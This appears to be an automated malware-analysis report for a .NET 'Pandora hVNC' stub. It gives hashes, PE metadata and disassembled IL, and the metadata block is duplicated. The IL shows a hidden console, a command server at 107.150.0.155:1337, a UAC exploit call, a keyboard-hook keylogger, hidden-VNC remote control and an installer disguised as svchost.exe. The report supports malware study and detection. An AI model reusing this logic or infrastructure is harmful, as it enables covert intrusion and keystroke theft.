Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 72898c00ec1b93056e8876be3b1fd68f
|
| Sha1 | f3b67795a2f3d34fe4a2f831781ed49c4d7efc13
|
| Sha256 | fb7e10845d0ebac00b55f38a29e141c689a33cae3719eefb26fbb572b39aa3a4
|
| Sha384 | 6acfc13851c4708349b79777b0ba445f948b19f47d999dc1a046bd4667aa2a3419a19c3890156db16688485d4a905c4d
|
| Sha512 | 60df1078d07670f40b2bd4c8e2ebcb0efa1b1c491ec5f78d86432c1de4b6665c655b7168d8265c6f2431932172c2b20cb9bc86303077cdb954f85a24b8c706b0
|
| SSDeep | 3072:KbzoH+0OoCthfbEFtbcfjF45gjryKKqH6JY2doszEmQotEPPcfPtxO8Y:Kbzoe0ODhTEPgnjuIJzo+PPcfPt88
|
| TLSH | 6BF36D243AFA5029F173AF7A5FE47596CA2FB7733B07A85D205003864B23A81DDD153A
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Stub.exe |
| Full Name | Stub.exe |
| EntryPoint | System.Void Stub.Program::Main(System.String[]) |
| Scope Name | Stub.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Stub |
| Assembly Version | 3.6.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.5.2 |
| Total Strings | 141 |
| Main Method | System.Void Stub.Program::Main(System.String[]) |
| Main IL Instruction Count | 211 |
| Main IL | call System.IntPtr Stub.Program::GetConsoleWindow() ldc.i4.0 <null> call System.Boolean Stub.Program::ShowWindow(System.IntPtr,System.Int32) pop <null> ldstr 107.150.0.155 call System.Void Stub.Program::set_IP_DNS(System.String) ldstr 1337 call System.Void Stub.Program::set_PORT(System.String) ldstr svchost call System.Void Stub.Program::set_ID(System.String) ldstr lXFUFPDQa call System.Void Stub.Program::set_MUTEX(System.String) ldstr False stloc.0 <null> ldstr 0 stloc.1 <null> ldstr Services stloc.2 <null> ldstr svchost.exe stloc.3 <null> ldstr False stloc.s V_4 ldstr True stloc.s V_5 ldstr True stloc.s V_6 ldstr False stloc.s V_7 ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_007B: ldloc.s V_6 call System.Void Stub.Program::UACxploit() ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld Stub.Program/LowLevelKeyboardProc Stub.Program::_proc call System.IntPtr Stub.Program::SetHook(Stub.Program/LowLevelKeyboardProc) stsfld System.IntPtr Stub.Program::_hookID ldsfld System.String Stub.Program::ologgerPath call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld System.String Stub.Program::ologgerPath call System.Void System.IO.File::Delete(System.String) ldloc.s V_5 ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_01CF: ldloc.s V_5 ldstr Do You Want To Install Pandora hVNC? ldstr Pandora hVNC ldc.i4.4 <null> ldc.i4.s 32 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) stloc.s V_8 ldloc.s V_8 ldc.i4.6 <null> bne.un IL_01A9: ldloc.s V_8 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_012A: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_015F: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0159: ldloc.s V_10 ldloc.s V_11 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0167: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0136: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 ldloc.s V_8 ldc.i4.7 <null> bne.un IL_02A3: ldloc.s V_6 ldstr Pandora WILL NOT be installed to your system ldstr Pandora hVNC ldc.i4.0 <null> ldc.i4.s 48 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) br IL_02A3: ldloc.s V_6 ldloc.s V_5 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_022C: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br.s IL_02A3: ldloc.s V_6 call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_0261: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_12 ldloc.s V_12 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_025B: ldloc.s V_10 ldloc.s V_12 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0269: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0238: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02B6: ldloc.s V_7 call System.Void System.Windows.Forms.Application::Run() ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) pop <null> ret <null> |
| Module Name | Stub.exe |
| Full Name | Stub.exe |
| EntryPoint | System.Void Stub.Program::Main(System.String[]) |
| Scope Name | Stub.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Stub |
| Assembly Version | 3.6.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.5.2 |
| Total Strings | 141 |
| Main Method | System.Void Stub.Program::Main(System.String[]) |
| Main IL Instruction Count | 211 |
| Main IL | call System.IntPtr Stub.Program::GetConsoleWindow() ldc.i4.0 <null> call System.Boolean Stub.Program::ShowWindow(System.IntPtr,System.Int32) pop <null> ldstr 107.150.0.155 call System.Void Stub.Program::set_IP_DNS(System.String) ldstr 1337 call System.Void Stub.Program::set_PORT(System.String) ldstr svchost call System.Void Stub.Program::set_ID(System.String) ldstr lXFUFPDQa call System.Void Stub.Program::set_MUTEX(System.String) ldstr False stloc.0 <null> ldstr 0 stloc.1 <null> ldstr Services stloc.2 <null> ldstr svchost.exe stloc.3 <null> ldstr False stloc.s V_4 ldstr True stloc.s V_5 ldstr True stloc.s V_6 ldstr False stloc.s V_7 ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_007B: ldloc.s V_6 call System.Void Stub.Program::UACxploit() ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld Stub.Program/LowLevelKeyboardProc Stub.Program::_proc call System.IntPtr Stub.Program::SetHook(Stub.Program/LowLevelKeyboardProc) stsfld System.IntPtr Stub.Program::_hookID ldsfld System.String Stub.Program::ologgerPath call System.Boolean System.IO.File::Exists(System.String) brfalse.s IL_00AE: ldloc.s V_5 ldsfld System.String Stub.Program::ologgerPath call System.Void System.IO.File::Delete(System.String) ldloc.s V_5 ldstr False call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_01CF: ldloc.s V_5 ldstr Do You Want To Install Pandora hVNC? ldstr Pandora hVNC ldc.i4.4 <null> ldc.i4.s 32 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) stloc.s V_8 ldloc.s V_8 ldc.i4.6 <null> bne.un IL_01A9: ldloc.s V_8 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_012A: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_015F: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_11 ldloc.s V_11 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0159: ldloc.s V_10 ldloc.s V_11 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0167: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0136: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br IL_02A3: ldloc.s V_6 ldloc.s V_8 ldc.i4.7 <null> bne.un IL_02A3: ldloc.s V_6 ldstr Pandora WILL NOT be installed to your system ldstr Pandora hVNC ldc.i4.0 <null> ldc.i4.s 48 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) br IL_02A3: ldloc.s V_6 ldloc.s V_5 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldstr cvtres call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcessesByName(System.String) ldlen <null> brtrue.s IL_022C: call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) br.s IL_02A3: ldloc.s V_6 call System.Diagnostics.Process[] System.Diagnostics.Process::GetProcesses() stloc.s V_9 ldc.i4.0 <null> stloc.s V_10 br.s IL_0261: ldloc.s V_10 ldloc.s V_9 ldloc.s V_10 ldelem.ref <null> stloc.s V_12 ldloc.s V_12 callvirt System.String System.Diagnostics.Process::get_ProcessName() ldstr cvtres call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_025B: ldloc.s V_10 ldloc.s V_12 callvirt System.Void System.Diagnostics.Process::Kill() br.s IL_0269: call System.String Stub.Program::get_IP_DNS() ldloc.s V_10 ldc.i4.1 <null> add <null> stloc.s V_10 ldloc.s V_10 ldloc.s V_9 ldlen <null> conv.i4 <null> blt.s IL_0238: ldloc.s V_9 call System.String Stub.Program::get_IP_DNS() ldstr call System.String Stub.Program::get_PORT() call System.String System.String::Concat(System.String,System.String,System.String) call System.String Stub.Program::get_ID() call System.String Stub.Program::get_MUTEX() call System.Void HVNC::StartHVNC(System.String,System.String,System.String) ldloc.0 <null> ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02A3: ldloc.s V_6 ldloc.1 <null> ldloc.2 <null> ldloc.3 <null> ldloc.s V_4 call System.Void Stub.Installer::Run(System.String,System.String,System.String,System.String) ldloc.s V_6 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_02B6: ldloc.s V_7 call System.Void System.Windows.Forms.Application::Run() ldloc.s V_7 ldstr True call System.Boolean System.String::op_Equality(System.String,System.String) pop <null> ret <null> |